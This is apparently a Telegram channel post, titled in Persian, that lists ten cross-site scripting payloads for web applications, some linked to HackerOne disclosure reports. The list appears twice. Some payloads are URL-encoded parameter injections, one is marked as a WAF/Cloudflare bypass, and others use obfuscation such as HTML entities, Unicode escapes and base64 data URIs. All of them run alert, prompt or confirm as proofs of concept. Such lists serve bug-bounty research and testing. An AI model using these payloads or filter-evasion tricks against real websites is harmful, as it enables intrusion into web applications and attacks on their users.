🧑‍💻Cyber.vision🧑‍💻

10 پیلود XSS که ممکنه به کار بیاد:

1=> ?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >
hackerone.com/reports/2433634

2=> ?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
hackerone.com/reports/846338
The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag

3=> <a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
WAF / Cloudflare Bypass

4=> ”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores
hackerone.com/reports/484434

filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the

5=> <a href=[ ]" onmouseover=prompt(1)//">XYZ</a>

6=> <script /*/>/*/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/*/</script /*/

7=> <blink/ onmouseover=prompt(1)>OnMouseOver
Firefox & Opera

8=> <svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>

9=> <script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";a.click();</script>

10=> jaVasCript:/--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>"'alert(1)

HackerOne

GoCD disclosed on HackerOne: XSS in GOCD Analytics Plugin

The `gocd/gocd-analytics-plugin` in `info-message.js` at line 28 contains a Cross-Site Scripting (XSS) vulnerability, which can be exploited via the `?msg=` parameter. Attackers can inject...

www.tgoop.com/pythonwithmedev/417

164 viewsFeb 10 at 17:22

10 پیلود XSS که ممکنه به کار بیاد:

1=> ?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >
hackerone.com/reports/2433634

2=> ?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
hackerone.com/reports/846338
The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag

3=> <a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
WAF / Cloudflare Bypass

4=> ”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores
hackerone.com/reports/484434

filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the

5=> <a href=[ ]" onmouseover=prompt(1)//">XYZ</a>

6=> <script /*/>/*/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/*/</script /*/

7=> <blink/ onmouseover=prompt(1)>OnMouseOver
Firefox & Opera

8=> <svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>

9=> <script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";a.click();</script>

10=> jaVasCript:/--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>"'alert(1)

BY 🧑‍💻Cyber.vision🧑‍💻